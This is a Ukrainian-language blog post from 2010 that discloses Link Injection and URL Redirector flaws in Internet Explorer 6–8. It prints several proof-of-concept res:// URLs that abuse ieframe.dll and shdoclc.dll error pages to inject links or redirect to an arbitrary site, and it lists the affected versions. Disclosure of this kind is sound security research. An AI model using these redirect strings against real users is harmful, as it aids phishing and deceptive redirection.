Link Injection та Redirector уразливості в Internet Explorer

23:52 23.08.2010

Нещодавно, 20.08.2010, я виявив Link Injection та Redirector (URL Redirector Abuse) уразливості в різних версіях Microsoft Internet Explorer. Так що, як видно з мого дослідження, до Link Injection та Redirector уразливі не тільки веб додатки, але й браузери.

Link Injection (в IE8):

res://ieframe.dll/acr_error.htm#Site,http://site.com

Redirector:

В IE7 та IE8:

res://ieframe.dll/http_404.htm#http://websecurity.com.ua

В IE6, IE7 та IE8:

res://c:\windows\system32\shdoclc.dll/http_404.htm#http://websecurity.com.ua

res://shdoclc.dll/http_404.htm#http://websecurity.com.ua

res://c:\windows\system32\shdoclc.dll/syntax.htm#http://websecurity.com.ua

res://shdoclc.dll/syntax.htm#http://websecurity.com.ua

В даних Redirector уразливостях потрібно буде після переходу по лінці (у всіх зазначених браузерах) натиснути F5 чи клікнути на кнопку Refresh для редирекції на заданий сайт. Тому що браузер змінює адресу в адресному рядку на вказаний URL, але не переходить на нього, тому йому потрібно допомогти :-) .

Уразливі версії Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) та попередні версії.


Leave a Reply

You must be logged in to post a comment.